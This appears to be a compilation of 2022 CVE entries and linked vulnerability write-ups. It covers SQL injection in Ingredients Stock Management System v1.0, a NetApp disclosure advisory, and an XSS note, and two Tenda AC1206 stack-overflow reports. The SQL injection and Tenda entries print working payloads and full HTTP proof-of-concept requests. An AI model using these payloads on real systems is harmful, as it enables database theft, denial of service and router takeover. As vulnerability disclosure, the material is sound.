Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_item.

Permalink

Cannot retrieve contributors at this time

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/classes/Master.php?f=delete\_item

Vulnerability location: /isms/classes/Master.php?f=delete\_item, id

db\_name = isms\_db;

\[+\] Payload: id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /isms/classes/Master.php?f\=delete\_item HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36693: vul-wiki/SQLi-6.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /items/manage_item.php.

Permalink

Cannot retrieve contributors at this time

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/items/manage\_item.php

Vulnerability location: /isms/admin/items/manage\_item.php, id

db\_name = isms\_db;length=7

\[+\] Payload: isms/admin/items/manage\_item.php?id=4%27%20and%20length(database())%20=%207--+ // Leak place ---> id

GET /isms/admin/items/manage\_item.php?id\=4%27%20and%20length(database())%20\=%207\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

When length (database ()) = 7 

When length (database ()) = 6

CVE-2022-36700: vul-wiki/SQLi-13.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /categories/manage_category.php.

Permalink

Cannot retrieve contributors at this time

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/categories/manage\_category.php

Vulnerability location: /isms/admin/categories/manage\_category.php, id

db\_name = isms\_db;length=7

\[+\] Payload: isms/admin/categories/manage\_category.php?id=3%27%20and%20length(database())%20=%207--+ // Leak place ---> id

GET /isms/admin/categories/manage\_category.php?id\=3%27%20and%20length(database())%20\=%207\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

When length (database ()) = 7 

When length (database ()) = 6

CVE-2022-36699: vul-wiki/SQLi-11.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /stocks/manage_stockin.php.

Permalink

Cannot retrieve contributors at this time

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/stocks/manage\_stockin.php

Vulnerability location /isms/admin/stocks/manage\_stockin.php, iid

db\_name = isms\_db;length=7

\[+\] Payload: /isms/admin/stocks/manage\_stockin.php?iid=4&id=4%27%20and%20length(database())%20=%207--+ // Leak place ---> iid

GET /isms/admin/stocks/manage\_stockin.php?iid\=4&id\=4%27%20and%20length(database())%20\=%207\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

When length (database ()) = 7 

When length (database ()) = 6

CVE-2022-36703: vul-wiki/SQLi-14.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /categories/view_category.php.

Permalink

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/categories/view\_category.php

Vulnerability location: /isms/admin/categories/view\_category.php, id

db\_name = isms\_db;length=7

\[+\] Payload: /isms/admin/categories/view\_category.php?id=3%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /isms/admin/categories/view\_category.php?id\=3%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

When length (database ()) = 7 

When length (database ()) = 6

CVE-2022-36698: vul-wiki/SQLi-10.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /items/view_item.php.

Permalink

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/items/view\_item.php

Vulnerability location: /isms/admin/items/view\_item.php, id

db\_name = isms\_db;length=7

\[+\] Payload: isms/admin/items/view\_item.php?id=3%27%20and%20length(database())%20=%207--+ // Leak place ---> id

GET /isms/admin/items/view\_item.php?id\=4%27%20and%20length(database())%20\=%207\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

When length (database ()) = 7 

When length (database ()) = 6

CVE-2022-36701: vul-wiki/SQLi-12.md at master · k0xx11/vul-wiki

Active IQ Unified Manager for VMware vSphere, Linux, and Microsoft Windows versions prior to 9.10P1 are susceptible to a vulnerability which could allow an attacker to discover cluster, node and Active IQ Unified Manager specific information via AutoSupport telemetry data that is sent even when AutoSupport has been disabled.

*   Home
*   Advisory
*   CVE-2022-23235 Information Disclosure Vulnerability in Active IQ Unified Manager

circle-check-alt This advisory should be considered the single source of current, up-to-date, authorized and accurate information from NetApp regarding Full Support products and versions.

**Advisory ID:** NTAP-20220324-0001 **Version:** 1.0 **Last updated:** 03/24/2022 **Status:** Final. **CVEs:** CVE-2022-23235

This document is provided solely for informational purposes. All information is based upon NetApp’s current knowledge and understanding of the hardware and software products tested by NetApp, and the methodology and assumptions used by NetApp. NetApp is not responsible for any errors or omissions that may be contained herein, and no warranty, representation, or other legal commitment or obligation is being provided by NetApp. © 2022 NetApp, Inc. All rights reserved. No portions of this document may be reproduced without prior written consent of NetApp, Inc.

CVE-2022-23235: CVE-2022-23235 Information Disclosure Vulnerability in Active IQ Unified Manager

MDaemon Technologies SecurityGateway for Email Servers 8.5.2 is vulnerable to Cross Site Scripting (XSS) via the currentRequest parameter.

CVE-2022-37238: SecurityGateway for Email Servers Release Notes

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the list parameter at the function formSetVirtualSer.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the formSetVirtualSer function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the formsetvirtualser function, str (the value of list) we entered will be passed into the save_virtualser_data function as a parameter, and this function has stack overflow.

In the save_virtualser_data function,the buf (the value of list) is formatted using the sscanf function and in the form of %[^,]%*c%[^,]%*c%[^,]%*c%s. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of lan_ip、 in_port 、out_port or protocol, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetVirtualServerCfg HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    list=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,b,c,d~
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37798: vuln/Tenda/AC1206/5 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the time parameter at the function setSmartPowerManagement.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the setSmartPowerManagement function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the setSmartPowerManagement function,time(the value of time) we entered is formatted using the sscanf function and in the form of %[^:]:%[^-]-%[^:]:%s. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of hour_start、min_start、hour_end or min_end, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/PowerSaveSet HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 12
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    time=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaa-bbb:1
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

Tag

#windows